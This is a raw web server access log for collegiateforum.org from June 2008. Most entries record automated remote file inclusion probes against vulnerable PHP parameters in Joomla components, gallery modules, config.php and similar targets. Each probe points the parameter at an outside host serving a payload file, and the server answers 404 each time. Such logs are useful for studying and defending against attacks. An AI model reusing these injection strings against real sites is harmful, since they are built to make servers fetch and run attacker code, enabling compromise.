64.72.119.227 - - [01/Jun/2008:18:22:54 -0700] "GET //administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://piceadesign.co.uk/menu_bar/ons.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.collegiateforum.org"
64.72.119.227 - - [01/Jun/2008:18:22:54 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://piceadesign.co.uk/menu_bar/ons.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.collegiateforum.org"
89.188.112.121 - - [01/Jun/2008:18:23:43 -0700] "GET /logs/access_071224.log/modules/tinycontent/admin/index.php?spaw_root=http://https-secure.com/estheticformula/cart/html/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
209.216.249.194 - - [01/Jun/2008:18:24:26 -0700] "GET /logs/access.log/!scanhttp://www.opns.be/images/stories/er.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
209.216.249.194 - - [01/Jun/2008:18:24:26 -0700] "GET /logs/!scanhttp://www.opns.be/images/stories/er.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
209.216.249.194 - - [01/Jun/2008:18:24:26 -0700] "GET /!scanhttp://www.opns.be/images/stories/er.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
74.8.73.90 - - [01/Jun/2008:18:25:58 -0700] "GET /logs/admincp/auth/checklogin.php?cfgProgDir=http://arai.web.id/jek/bot/dodol.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
74.8.73.90 - - [01/Jun/2008:18:25:58 -0700] "GET /admincp/auth/checklogin.php?cfgProgDir=http://arai.web.id/jek/bot/dodol.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
83.175.248.213 - - [01/Jun/2008:18:26:18 -0700] "GET /logs/access_080324.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
83.175.248.213 - - [01/Jun/2008:18:26:22 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
83.175.248.213 - - [01/Jun/2008:18:26:29 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
64.72.119.227 - - [01/Jun/2008:18:26:55 -0700] "GET //administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://piceadesign.co.uk/menu_bar/ons.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.collegiateforum.org"
62.75.184.73 - - [01/Jun/2008:18:27:18 -0700] "GET /logs/access_080204.log/admincp/auth/checklogin.php?cfgProgDir=http://www.andygo.ru/cache/system/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
83.175.248.213 - - [01/Jun/2008:18:27:58 -0700] "GET /logs/access_080324.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
83.175.248.213 - - [01/Jun/2008:18:28:05 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
83.175.248.213 - - [01/Jun/2008:18:28:15 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
83.175.248.213 - - [01/Jun/2008:18:30:04 -0700] "GET /logs/access_080324.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
83.175.248.213 - - [01/Jun/2008:18:30:08 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
212.244.43.139 - - [01/Jun/2008:18:30:10 -0700] "GET /logs/bookmark4u/lostpasswd.php?env[include_prefix]=http://201.6.243.67/UP/xs.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.collegiateforum.org"
212.244.43.139 - - [01/Jun/2008:18:30:10 -0700] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://201.6.243.67/UP/xs.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.collegiateforum.org"
83.175.248.213 - - [01/Jun/2008:18:30:12 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
209.216.249.194 - - [01/Jun/2008:18:30:34 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.e-sportv.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
209.216.249.194 - - [01/Jun/2008:18:30:34 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.e-sportv.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
209.216.249.194 - - [01/Jun/2008:18:31:09 -0700] "GET /logs/access_080324.log//modules/vwar/admin/admin.php?vwar_root=http://www.e-sportv.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
209.216.249.194 - - [01/Jun/2008:18:31:09 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.e-sportv.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
209.216.249.194 - - [01/Jun/2008:18:31:10 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.e-sportv.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
62.140.19.142 - - [01/Jun/2008:18:32:01 -0700] "GET /logs/access.log/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://singspiration.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.collegiateforum.org"
83.175.248.213 - - [01/Jun/2008:18:32:27 -0700] "GET /logs/database.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/adrikrasnow/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.collegiateforum.org"
209.216.249.194 - - [01/Jun/2008:18:33:11 -0700] "GET /logs/access_071210.log//modules/vwar/admin/admin.php?vwar_root=http://www.e-sportv.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
61.64.112.207 - - [01/Jun/2008:18:33:25 -0700] "GET /logs/access_080128.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://funn.as.ro/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
200.229.199.197 - - [01/Jun/2008:18:33:49 -0700] "GET /logs/access.log/config.php?path_to_root=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.collegiateforum.org"
200.229.199.197 - - [01/Jun/2008:18:33:49 -0700] "GET /config.php?path_to_root=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.collegiateforum.org"
200.229.199.197 - - [01/Jun/2008:18:33:50 -0700] "GET /logs/config.php?path_to_root=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.collegiateforum.org"
200.229.199.197 - - [01/Jun/2008:18:33:50 -0700] "GET /logs/access.log/config.php?path_to_root=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.collegiateforum.org"
200.229.199.197 - - [01/Jun/2008:18:33:50 -0700] "GET /config.php?path_to_root=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.collegiateforum.org"
200.229.199.197 - - [01/Jun/2008:18:33:51 -0700] "GET /logs/config.php?path_to_root=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.collegiateforum.org"
87.230.21.32 - - [01/Jun/2008:18:33:58 -0700] "GET /logs/access.log/config.php?path_to_root=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
87.230.21.32 - - [01/Jun/2008:18:33:59 -0700] "GET /config.php?path_to_root=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
87.230.21.32 - - [01/Jun/2008:18:34:00 -0700] "GET /logs/config.php?path_to_root=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
211.234.107.233 - - [01/Jun/2008:18:34:25 -0700] "GET /logs/access.log/config.php?path_to_root=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
211.234.107.233 - - [01/Jun/2008:18:34:25 -0700] "GET /logs/access.log/config.php?path_to_root=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
211.234.107.233 - - [01/Jun/2008:18:34:26 -0700] "GET /config.php?path_to_root=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
211.234.107.233 - - [01/Jun/2008:18:34:26 -0700] "GET /config.php?path_to_root=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
211.234.107.233 - - [01/Jun/2008:18:34:26 -0700] "GET /logs/config.php?path_to_root=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
211.234.107.233 - - [01/Jun/2008:18:34:26 -0700] "GET /logs/config.php?path_to_root=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
211.234.107.233 - - [01/Jun/2008:18:34:28 -0700] "GET /logs/access.log/config.php?path_to_root=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
211.234.107.233 - - [01/Jun/2008:18:34:28 -0700] "GET /config.php?path_to_root=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
211.234.107.233 - - [01/Jun/2008:18:34:29 -0700] "GET /logs/config.php?path_to_root=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
202.29.32.2 - - [01/Jun/2008:18:34:34 -0700] "GET /logs/access.log/config.php?path_to_root=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
202.29.32.2 - - [01/Jun/2008:18:34:34 -0700] "GET /logs/access.log/config.php?path_to_root=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
202.29.32.2 - - [01/Jun/2008:18:34:35 -0700] "GET /config.php?path_to_root=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
202.29.32.2 - - [01/Jun/2008:18:34:35 -0700] "GET /config.php?path_to_root=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
202.29.32.2 - - [01/Jun/2008:18:34:35 -0700] "GET /logs/config.php?path_to_root=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
202.29.32.2 - - [01/Jun/2008:18:34:36 -0700] "GET /logs/access.log/config.php?path_to_root=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
202.29.32.2 - - [01/Jun/2008:18:34:36 -0700] "GET /logs/config.php?path_to_root=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
202.29.32.2 - - [01/Jun/2008:18:34:36 -0700] "GET /config.php?path_to_root=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
202.29.32.2 - - [01/Jun/2008:18:34:37 -0700] "GET /logs/config.php?path_to_root=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
202.29.32.2 - - [01/Jun/2008:18:34:41 -0700] "GET /logs/access.log/config.php?path_to_root=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
202.29.32.2 - - [01/Jun/2008:18:34:42 -0700] "GET /config.php?path_to_root=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
202.29.32.2 - - [01/Jun/2008:18:34:43 -0700] "GET /logs/config.php?path_to_root=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
87.230.21.32 - - [01/Jun/2008:18:34:49 -0700] "GET /config.php?path_to_root=http://usuarios.arnet.com.ar/adrikrasnow/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.collegiateforum.org"
87.230.21.32 - - [01/Jun/2008:18:34:50 -0700] "GET /logs/config.php?path_to_root=http://usuarios.arnet.com.ar/adrikrasnow/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.collegiateforum.org"
213.246.51.45 - - [01/Jun/2008:18:36:21 -0700] "GET /admincp/auth/checklogin.php?cfgProgDir=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
200.229.199.197 - - [01/Jun/2008:18:36:54 -0700] "GET /config.php?path_to_root=http://usuarios.arnet.com.ar/adrikrasnow/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.collegiateforum.org"
200.229.199.197 - - [01/Jun/2008:18:36:54 -0700] "GET /logs/config.php?path_to_root=http://usuarios.arnet.com.ar/adrikrasnow/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.collegiateforum.org"
211.234.107.233 - - [01/Jun/2008:18:37:24 -0700] "GET /config.php?path_to_root=http://usuarios.arnet.com.ar/adrikrasnow/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "collegiateforum.org"
211.234.107.233 - - [01/Jun/2008:18:37:24 -0700] "GET /logs/config.php?path_to_root=http://usuarios.arnet.com.ar/adrikrasnow/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "collegiateforum.org"
211.234.107.233 - - [01/Jun/2008:18:37:43 -0700] "GET /logs/config.php?path_to_root=http://usuarios.arnet.com.ar/adrikrasnow/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.collegiateforum.org"
211.234.107.233 - - [01/Jun/2008:18:37:43 -0700] "GET /config.php?path_to_root=http://usuarios.arnet.com.ar/adrikrasnow/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.collegiateforum.org"
62.163.140.46 - - [01/Jun/2008:18:37:48 -0700] "GET /logs/admincp/auth/checklogin.php?cfgProgDir=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
62.163.140.46 - - [01/Jun/2008:18:37:49 -0700] "GET /admincp/auth/checklogin.php?cfgProgDir=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
65.55.213.10 - - [01/Jun/2008:18:38:00 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.collegiateforum.org"
65.55.213.10 - - [01/Jun/2008:18:38:00 -0700] "GET /Jonathan_Fantini_Porter/img/bug.gif HTTP/1.0" 404 275 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.collegiateforum.org"
89.108.64.164 - - [01/Jun/2008:18:38:16 -0700] "GET /logs/access_080204.log/admin/editor2/spaw_control.class.php?spaw_root=http://www.webhostmedic.com/p.c? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
89.108.64.164 - - [01/Jun/2008:18:38:16 -0700] "GET /admin/editor2/spaw_control.class.php?spaw_root=http://www.webhostmedic.com/p.c? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
89.108.64.164 - - [01/Jun/2008:18:38:16 -0700] "GET /logs/admin/editor2/spaw_control.class.php?spaw_root=http://www.webhostmedic.com/p.c? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
69.27.110.65 - - [01/Jun/2008:18:39:08 -0700] "GET /logs/access.log/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.collegiateforum.org"
69.27.110.65 - - [01/Jun/2008:18:39:09 -0700] "GET /contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.collegiateforum.org"
69.27.110.65 - - [01/Jun/2008:18:39:09 -0700] "GET /logs/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.collegiateforum.org"
202.29.32.2 - - [01/Jun/2008:18:40:13 -0700] "GET /logs/config.php?path_to_root=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
202.29.32.2 - - [01/Jun/2008:18:40:14 -0700] "GET /config.php?path_to_root=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
74.222.17.2 - - [01/Jun/2008:18:40:23 -0700] "GET /logs/config.php?path_to_root=http://usuarios.arnet.com.ar/adrikrasnow/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "collegiateforum.org"
74.222.17.2 - - [01/Jun/2008:18:40:24 -0700] "GET /config.php?path_to_root=http://usuarios.arnet.com.ar/adrikrasnow/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "collegiateforum.org"
77.41.95.125 - - [01/Jun/2008:18:40:44 -0700] "GET / HTTP/1.0" 200 918 "http://www.collegiateforum.org/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; WOW64; SV1; .NET CLR 2.0.50727)" "www.collegiateforum.org"
209.216.249.194 - - [01/Jun/2008:18:40:55 -0700] "GET /logs/access.log/bookmark4u/lostpasswd.php?env[include_prefix]=http://www.e-sportv.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
209.216.249.194 - - [01/Jun/2008:18:40:56 -0700] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://www.e-sportv.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
209.216.249.194 - - [01/Jun/2008:18:40:56 -0700] "GET /logs/bookmark4u/lostpasswd.php?env[include_prefix]=http://www.e-sportv.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
209.216.249.194 - - [01/Jun/2008:18:41:20 -0700] "GET /logs/access_071224.log/bookmark4u/lostpasswd.php?env[include_prefix]=http://www.e-sportv.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
216.80.70.50 - - [01/Jun/2008:18:41:54 -0700] "GET /logs/access_080324.log/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://nigeria-news.net/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.collegiateforum.org"
216.80.70.50 - - [01/Jun/2008:18:41:54 -0700] "GET /components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://nigeria-news.net/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.collegiateforum.org"
216.80.70.50 - - [01/Jun/2008:18:41:54 -0700] "GET /logs/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://nigeria-news.net/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.collegiateforum.org"
194.85.89.204 - - [01/Jun/2008:18:42:07 -0700] "GET /logs/access_080121.log/modules/My_eGallery/index.php?basepath=http://www.mondocitta.net/.htaccess_/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
194.85.89.204 - - [01/Jun/2008:18:42:08 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.mondocitta.net/.htaccess_/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
194.85.89.204 - - [01/Jun/2008:18:42:08 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.mondocitta.net/.htaccess_/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
194.85.89.204 - - [01/Jun/2008:18:42:24 -0700] "GET /logs/access_080303.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.mondocitta.net/.htaccess_/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
194.85.89.204 - - [01/Jun/2008:18:42:24 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.mondocitta.net/.htaccess_/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
194.85.89.204 - - [01/Jun/2008:18:42:25 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.mondocitta.net/.htaccess_/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
194.85.89.204 - - [01/Jun/2008:18:42:28 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.mondocitta.net/.htaccess_/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
202.29.32.2 - - [01/Jun/2008:18:42:38 -0700] "GET /logs/config.php?path_to_root=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
202.29.32.2 - - [01/Jun/2008:18:42:39 -0700] "GET /config.php?path_to_root=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
200.140.135.103 - - [01/Jun/2008:18:43:22 -0700] "GET /logs/access_080324.log/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://https-secure.com/estheticformula/cart/html/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
202.29.32.2 - - [01/Jun/2008:18:43:22 -0700] "GET /config.php?path_to_root=http://usuarios.arnet.com.ar/adrikrasnow/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "collegiateforum.org"
200.140.135.103 - - [01/Jun/2008:18:43:23 -0700] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://https-secure.com/estheticformula/cart/html/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
200.140.135.103 - - [01/Jun/2008:18:43:23 -0700] "GET /logs/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://https-secure.com/estheticformula/cart/html/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
202.29.32.2 - - [01/Jun/2008:18:43:28 -0700] "GET /logs/config.php?path_to_root=http://usuarios.arnet.com.ar/adrikrasnow/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "collegiateforum.org"
200.140.135.103 - - [01/Jun/2008:18:44:24 -0700] "GET /logs/access_071224.log/modules/tinycontent/admin/index.php?spaw_root=http://https-secure.com/estheticformula/cart/html/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
83.175.248.213 - - [01/Jun/2008:18:44:50 -0700] "GET /logs/access_071231.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
84.243.253.159 - - [01/Jun/2008:18:45:05 -0700] "GET /logs/main.php?d1=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
84.243.253.159 - - [01/Jun/2008:18:45:05 -0700] "GET /main.php?d1=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
200.229.199.197 - - [01/Jun/2008:18:45:05 -0700] "GET /logs/access_080128.log/config.php?path_to_root=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.collegiateforum.org"
219.127.171.156 - - [01/Jun/2008:18:45:09 -0700] "GET /logs/access.log/components/com_joomlaboard/image_upload.php?sbp=http://www.walmax.eu/upload/.help/beleaid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "collegiateforum.org"
219.127.171.156 - - [01/Jun/2008:18:45:09 -0700] "GET /components/com_joomlaboard/image_upload.php?sbp=http://www.walmax.eu/upload/.help/beleaid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "collegiateforum.org"
219.127.171.156 - - [01/Jun/2008:18:45:10 -0700] "GET /logs/components/com_joomlaboard/image_upload.php?sbp=http://www.walmax.eu/upload/.help/beleaid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "collegiateforum.org"
87.230.21.32 - - [01/Jun/2008:18:45:20 -0700] "GET /logs/access_080128.log/config.php?path_to_root=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
83.175.248.213 - - [01/Jun/2008:18:45:21 -0700] "GET /logs/access_071231.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
83.175.248.213 - - [01/Jun/2008:18:45:22 -0700] "GET /logs/access_071231.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
200.229.199.197 - - [01/Jun/2008:18:45:27 -0700] "GET /logs/access_080128.log/config.php?path_to_root=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.collegiateforum.org"
216.80.70.50 - - [01/Jun/2008:18:45:33 -0700] "GET /logs/access.log/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://nigeria-news.net/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.collegiateforum.org"
80.154.38.121 - - [01/Jun/2008:18:45:51 -0700] "GET /components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://mfe-gay.de/cek.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
